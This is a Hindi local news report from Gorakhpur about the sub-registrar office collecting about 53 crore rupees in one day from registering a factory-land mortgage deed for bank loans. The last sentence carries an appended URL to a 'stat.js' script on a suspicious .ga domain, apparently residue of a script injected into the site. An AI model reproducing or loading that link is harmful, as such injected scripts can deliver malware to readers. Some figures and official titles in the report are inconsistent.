गोरखपुर,( कुलसूम फात्मा )  सोमवार को गोरखपुर सदर तहसील के क्षेत्र में स्थित उप निबंधक प्रथम कार्यालय को एक ही दिन में 53 करोड़ 19 लाख 33000 रू की आय प्राप्त हुई दरअसल कारखाने की जमीन को बंधक रखकर के रकम 53 अरब 14करोड़ 53 लाख रुपए का लोन ले लिया है। डिपार्टमेंट के ऑफिसर का कहना है की गोरखपुर के रजिस्ट्री डिपार्टमेंट में पहली बार हुआ है ,की एक ही डीड से इतनी बड़ी रकम आई हो। और यह लोन कंपनी ने तकरीबन दिल्ली के कई बैंकों से लिया है। और जिसका रिप्रेजेंटेशन एसबीआई कैंप की ट्रस्टी कंपनी कर रही है। यह कंपनी गोरखपुर में खाद कारखाने का निर्माण कर रही है।

 

 

इसी रजिस्ट्रेशन में स्टांप ड्यूटी तथा रजिस्ट्रेशन शुल्क ऊपर रजिस्ट्री डिपार्टमेंट को तकरीबन 53.19 करोड़ की रकम मिली। यूआरएल के सीनियर मैनेजर जिनका नाम सुबोध दीक्षित है और एसबीआई कैप ट्रस्टी कंपनी लिमिटेड के मनन ओबरॉय तथा उपनिबंधक प्रथम योगेंद्र सिंह अन्य वहां पर मौके पर उपस्थित रहे।

 

 

योगेंद्र सिंह जो के डिप्टी मैनेजर हैं। उन्होंने बताया की यह लोन रजिस्ट्रेशन की प्रक्रिया तकरीबन 2 महीने से चल रही थी। बैंकों की दिल्ली में कम से कम 7 शाखाओं ने एच यू आर एल से लोन दिया है। इन सभी 7 बैंकों का रिप्रेजेंटेशन एसबीआई कैंप ट्रस्टी कंपनी लिमिटेड ही कर रही है। ऐसे में बहुत से दस्तावेज यहां से दिल्ली भेजे जाएंगे। इसकी तैयारी तेजी के साथ चल रही है और इसकी तैयारी हो जाएगी तो रजिस्ट्रेशन कराया जाएगा।

 

 

उन्होंने बताया लोन लेने के मामले में ग्रामीण एरिया पर तकरीबन 0.5 और शहर में 2.5% स्टांप ड्यूटी लगती है, लेकिन यह रकम 5 लाख से ज्यादा नहीं हो सकती है। तो इस मामले में स्टांप ड्यूटी बहुत ज्यादा आय नहीं हुई लेकिन रजिस्ट्रेशन फीस 53 करोड़ 14 लाख के आसपास आय हुई है रजिस्ट्रेशन फीस लोन की टोटल रकम का 1% लगता है। कहा की गोरखपुर रजिस्ट्री दफ्तर में यह इतिहास में पहली बार हुआ है जबकि डिपार्टमेंट को एक ही डेट से इतनी बड़ी आय प्राप्त हुई है।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.